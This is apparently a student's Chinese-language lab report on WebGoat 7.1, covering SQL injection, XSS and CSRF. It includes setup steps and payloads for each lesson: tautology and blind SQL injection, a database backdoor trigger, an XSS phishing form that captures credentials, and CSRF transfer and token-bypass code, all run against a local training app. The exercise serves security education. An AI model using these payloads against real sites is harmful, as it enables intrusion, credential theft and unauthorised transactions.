20154327 Exp9 Web安全基础
基础问题回答
(1)SQL注入攻击原理,如何防御
- 原理:
程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,攻击者利用SQL命令欺骗服务器执行恶意的SQL命令,获得某些他想得知的数据。 - 防御:
就像我们上次做实验对网页登陆的账户做了密码长度的限制,可以限制输入的长度、检查输入变量的数据类型,限制特殊字符的输入,把用户输入的or, –,';等关键字和特殊字符都过滤了,大不了抛出异常而已呗…… 或者用语言内建的安全机制(比如说 JDBC 的PreparedStatement就可以很大程度的防止 SQL 注入)
(2)XSS攻击的原理,如何防御
- 原理:
XSS攻击全称跨站脚本攻击,也由于没有对用户输入数据的合法性进行判断,攻击者在网页上插入恶意代码,攻击用户。 - 防御:
与防御SQL注入一样,可以通过检查用户的输入字符串,并做出限制。
(3)CSRF攻击原理,如何防御
- 原理:
跨站请求伪造,攻击者通过伪造身份等方式来达到一些非法目的,以你的名义来发送恶意请求。 - 防御:
使用验证码,表单中附加随机值,以此来防止冒充。
环境配置
-
去官网提供的GitHub上下载,那个速度是真的捉急,这里感谢下齐帅提供的
WebGoat8.0 -
我后面自己下的WebGoat7.1密码: 4327
-
顺便附上自己在网上找到的
WebGoat中文手册以及WebGoat用户指南 -
下载好后,使用命令:java -jar webgoat-server-8.0.0.M14.jar运行WebGoat
-
然后在浏览器中打开http://localhost:8080/WebGoat进入登录界面:
-
这里我的一开始一直显示 Firefox can’t establish a connection to the server at localhost:8080.
-
一开始以为是8080端口被占用了,利用netstat -tupln |grep 8080发现没有被占用,然后去从新看了下安装教程,怀疑是JDK的问题.
-
这里贴上一个自己安装JDK的教程,安装完后成功打开。
-
首先,去官方网站下载JDK1.8对应的版本
JDK -
将下载好的JDK包提取出来,解压出来文件夹名为 jdk1.8.0_172
开始拷贝目录 手动安装 (注意文件夹名根据自己的实际情况来设定)
sudo mkdir -p /usr/local/java
cp -r jdk1.8.0_172/ /usr/local/java/
- 如图
- 接下来配置JDK的环境变量
sudo gedit /etc/profile
- 复制以下内容追加到文件末尾(注意文件夹名根据自己的实际情况来设定)
JAVA_HOME=/usr/local/java/jdk1.8.0_172
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
-
如图:
-
告诉系统JDK的位置,最后2行代码不是重复,是要执行2次 。 (注意文件夹名根据自己的实际情况来设定)
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_172/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_172/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_172/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_172/bin/javaws" 1
-
如图:
-
设置新的JDK为默认,代码也是执行2次(注意文件夹名根据自己的实际情况来设定)
sudo update-alternatives --set java /usr/local/java/jdk1.8.0_172/bin/java
sudo update-alternatives --set java /usr/local/java/jdk1.8.0_172/bin/java
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_172/bin/javac
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_172/bin/javac
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_172/bin/javaws
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_172/bin/javaws
-
如图:
-
重载Profile文件
source /etc/profile
- 输入命令查看Java版本号
java -version
-
好了,至此,安装成功 !
-
尝试访问WebGoat,成功!
-
8.0的这里可以自己申请个账号,7.1的话有默认账号,用默认的就行。
-
成功登陆:
-
等开始做才做才发现,这是个大坑,由于WebGoat不同的版本课程都不一样,我在官网上下的是最新的8.0.0,网上找到的教程都是低版本的,高版本和低版本的操作完全不一样,只能参考着低版本再开着翻译做,但做完SQL之后WebGoat8便打不开了,可能是因为两个不共存的原因。
-
这里我用7.1重新做了一遍
Injection Flaws
Numeric SQL Injection
- 原理大概就是这里有一个SQL语句
SELECT * FROM weather_data WHERE station = [station]
-
可以拦截报文将station字段后补充成一个永真式101 OR 1=1。
-
但这里没有文本框让我们直接进行输入操作,只有一个滑动文本框让我们选择,这里提供一个简单的方法,不需要通过burp-suite,kali上自带的火狐开发人员工具调试,按F12或者右键审查元素打开。
-
于是整个语句就变成了
SELECT * FROM weather_data WHERE station = 101 OR 1=1
- 由于1=1恒成立,点击go,看到所有城市的天气,成功。
Log Spoofing
日志伪造,目的是通过注入恶意字符串,按照规则伪造出一条日志,在Username输入
zh%0d%0aLogin Succeeded for username: admin
-
其中%0d和%0a为CRLF换行符,看到的输出为
-
第二行就是我们刚刚伪造出来的
XPATH Injection
- 题干的意思大概是你的账号是Mike/test123。你的目标是尝试查看其他员工的数据。
- 和上面一样,尝试构造永真式
yzh' or 1=1 or 'a'='a
- 成功:
String SQL Injection
- 字符注入,这里和前面数字注入的方法差不多,构造一个永真式,还是用的之前的'or 1='1
yzh' OR '1'='1
SELECT * FROM user_data WHERE last_name = 'yzh' OR '1'='1'
- 成功:
LAB: SQL Injection
阶段1:String SQL Injection
- 使用字符串SQL注入绕过认证,让我们可以登陆Boss(“Neville”)的账号。
- 类似之前利用永真式想办法绕过验证,修改password=' or'1'='1,结果登陆失败,审查元素将最大长度maxlength改为50继续,成功~
阶段2:Parameterized Query #1
- 这里需要WEBGOAT的开发者版本,先跳过了。
阶段3:Numeric SQL Injection
- 绕过认证执行SQL注入,使登录Larry账户,但是能查看Boss的信息。
- 还是和之前的想法一样,我们只需将employee_id参数修改为:101 or 1=1 order by salary desc
Database Backdoors
-
利用SQL输入插入后门,首先是一个SQL注入点,可以通过数字注入看到所有人的薪水,然后使用以下SQL指令可以修改薪水
-
在User ID输入框输入:101;update employee set salary = 65000 where userid=101; ,点击提交,如下图所示:
-
使用SQL注入注入一个后门,下边这个后门好象是创建新用户的时候会自动修改邮箱为你的邮箱
101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid.
- 点击提交,如下图所示:
Blind Numeric SQL Injection
- 数字盲注,有些时候存在SQL注入,但是获取不到我们需要的信息,此时可以通过SQL语句的条件判断,进行盲注。
- 使用盲注进行爆破,在“Enter your Account Number”输入
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
- 根据返回的提示来判断
“(SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000"
- 为真或为假,逐步缩小范围,最后尝试用2364进行请求,返回成功,然后把2364输入表单,提交,如下图所示:
Blind String SQL Injection
- 使用盲注进行爆破,在“Enter your Account Number”输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'h' );
- 根据返回的提示来判断name的范围,直至返回成功,然后把Jill输入表单,提交,如下图所示:
Cross-Site Scripting (XSS)
Phishing with XSS
- 使用XSS和HTML插入制作一个钓鱼网站,代码如下:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
- 成功:
LAB:Cross Site Scripting
-
这里通过6个阶段系统的介绍了XSS。
-
Stage1-4这四个步骤Stage5-6主要是介绍了储存型XSS,而Stage5-6介绍了反射型的XSS,步骤如下:
阶段1:
- 使用Tom登录,编辑用户信息,在Street字段输入以下代码:
<script>alert("20154327");</script>
-
成功:
-
阶段2、4、6需要开发者版本先调过了。
阶段3:执行一个先前的存储XSS攻击
- 使用“David”登录,然后查看“Bruce”的信息,即可完成。
阶段5:执行一个反射XSS攻击
- 在搜索员工页面使用脆弱性手工制造一个包含反射XSS攻击的URL。验证使用此链接的另一个用户被此攻击影响。
- 以“Larry”登录,在“Search Staff”搜索框输入“”。
Stored XSS Attacks
- 最典型的储存型XSS的例子——留言板
- 因为可以输入任何信息,如果有人进行了恶意留言,那么之后的人便会中招。
- 具体操作:
- 在Title里输入“Test Stored XSS”,在 Message里输入
<script>alert("20154327yangzhenghui!");</script>
- 如下图所示:
Reflected XSS Attacks
- 当未验证的用户输入用在HTTP响应时会发生XSS。在一个反射XSS攻击中,攻击者可以使用攻击脚本制造一个URL,然后提交到另一个网站、发邮件或让受害者点击。
CSRF
Cross Site Request Forgery(CSRF)
-
实验目标:向新闻组发送一封email。这个email包含一个image,其URL指向一个恶意请求。
-
这里是一个储存型XSS和跨站请求伪造结合的示例,CSRF就是冒名登录,用代码伪造请求
-
在Title输入:20154327,在Message输入:
<img src="http://localhost:8080/WebGoat/attack?Screen=280&menu=900&transferFunds=5000" width="1" height="1" />
- 点击“Submit”,在Message List下出现一条提交的记录,如下图所示:
CSRF Prompt By-Pass
- 在Title输入:20154327;在Message输入:
<iframe
src="attack?Screen=280&menu=900&transferFunds=5000"
id="myFrame" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300"
onload="document.getElementById('frame2').src='attack?Screen=280&menu=900&transferFunds=CONFIRM';">
</iframe>
<iframe
id="frame2" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300">
</iframe>
- 如下图所示:
CSRF Token By-Pass
- 在Title输入:20154327
- 在Message输入构造的代码:
<script>
var tokensuffix;
function readFrame1()
{
var frameDoc = document.getElementById("frame1").contentDocument;
var form = frameDoc.getElementsByTagName("form")[0];
tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
loadFrame2();
}
function loadFrame2()
{
var testFrame = document.getElementById("frame2");
testFrame.src="attack?Screen=273&menu=900&transferFunds=5000" + tokensuffix;
}
</script>
<iframe src="attack?Screen=273&menu=900&transferFunds=main"
onload="readFrame1();"
id="frame1" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300"></iframe>
- 点击Submit,然后在Message List里点击“CSRF Token By-Pass Attack”,如下图所示:
实验总结与体会
-
提交实验的时候发现,博客园居然也没有设防,下面是我上面钓鱼网站用的,直接就在下面显示出来了,有点恐怖啊兄弟。。。
-
这次实验一开始下载是最新版的WebGoat8,做完第一部分SQL注入实验后,想尝试下WebGoat7.1的SQL注入加深自己的印象,于是去网上下载了WebGoat7.1进行实验,但返回来继续用8往下做的时候,WebGoat8便提示:There was an unexpected error. Please try again。便只能用7.1一路做下去,将7.1上关于SQL注入攻击、XSS攻击、CSRF攻击部分能做的全部做了一遍,加深自己的理解。